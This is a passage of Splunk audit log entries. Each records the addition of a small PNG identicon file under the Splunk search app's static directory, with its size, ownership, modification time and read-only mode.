isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.016, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/67.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.012, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/669.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.007, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/668.png", isdir=0, size=410, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:55.001, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/667.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.997, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/666.png", isdir=0, size=299, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.993, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/665.png", isdir=0, size=396, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.989, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/664.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.985, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/663.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.980, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/662.png", isdir=0, size=278, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.976, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/661.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.971, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/660.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.967, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/66.png", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.962, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/659.png", isdir=0, size=349, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.958, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/658.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.953, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/657.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.949, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/656.png", isdir=0, size=390, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.944, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/655.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.940, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/654.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.937, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/653.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.933, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/652.png", isdir=0, size=312, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.930, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/651.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.927, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/650.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.922, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/65.png", isdir=0, size=315, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.918, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/649.png", isdir=0, size=296, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.915, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/648.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.911, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/647.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.907, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/646.png", isdir=0, size=411, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.903, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/645.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.899, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/644.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.895, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/643.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.891, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/642.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.886, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/641.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.881, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/640.png", isdir=0, size=326, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.878, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/64.png", isdir=0, size=399, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.874, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/639.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.870, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/638.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.866, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/637.png", isdir=0, size=242, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.862, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/636.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.858, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/635.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.853, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/634.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.849, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/633.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.845, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/632.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.841, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/631.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.837, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/630.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.833, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/63.png", isdir=0, size=314, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.828, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/629.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.824, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/628.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.820, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/627.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.816, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/626.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.812, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/625.png", isdir=0, size=329, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.808, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/624.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.804, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/623.png", isdir=0, size=342, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.800, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/622.png", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.796, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/621.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.791, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/620.png", isdir=0, size=326, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.787, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/62.png", isdir=0, size=327, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.782, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/619.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.778, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/618.png", isdir=0, size=319, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.773, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/617.png", isdir=0, size=334, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.769, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/616.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.765, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/615.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.762, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/614.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.758, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/613.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.755, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/612.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.751, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/611.png", isdir=0, size=391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.747, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/610.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.743, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/61.png", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.740, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/609.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.736, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/608.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.732, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/607.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.728, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/606.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.724, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/605.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.721, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/604.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.715, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/603.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.711, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/602.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.707, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/601.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.702, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/600.png", isdir=0, size=336, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.698, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/60.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.694, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/6.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.690, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/599.png", isdir=0, size=292, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.685, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/598.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.680, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/597.png", isdir=0, size=341, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.676, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/596.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.672, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/595.png", isdir=0, size=407, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.668, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/594.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.664, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/593.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.660, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/592.png", isdir=0, size=345, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.656, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/591.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.652, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/590.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.647, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/59.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.643, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/589.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.637, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/588.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.633, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/587.png", isdir=0, size=398, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.629, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/586.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.624, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/585.png", isdir=0, size=274, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.619, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/584.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.614, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/583.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.611, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/582.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.606, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/581.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.601, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/580.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.596, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/58.png", isdir=0, size=324, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.592, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/579.png", isdir=0, size=282, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.587, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/578.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.583, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/577.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.578, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/576.png", isdir=0, size=274, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.574, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/575.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.570, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/574.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.564, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/573.png", isdir=0, size=396, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.561, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/572.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.556, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/571.png", isdir=0, size=267, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.552, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/570.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.546, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/57.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.542, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/569.png", isdir=0, size=325, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.537, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/568.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.533, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/567.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.527, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/566.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.522, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/565.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.516, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/564.png", isdir=0, size=361, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.511, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/563.png", isdir=0, size=410, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.506, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/562.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.501, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/561.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.494, user=n/a, 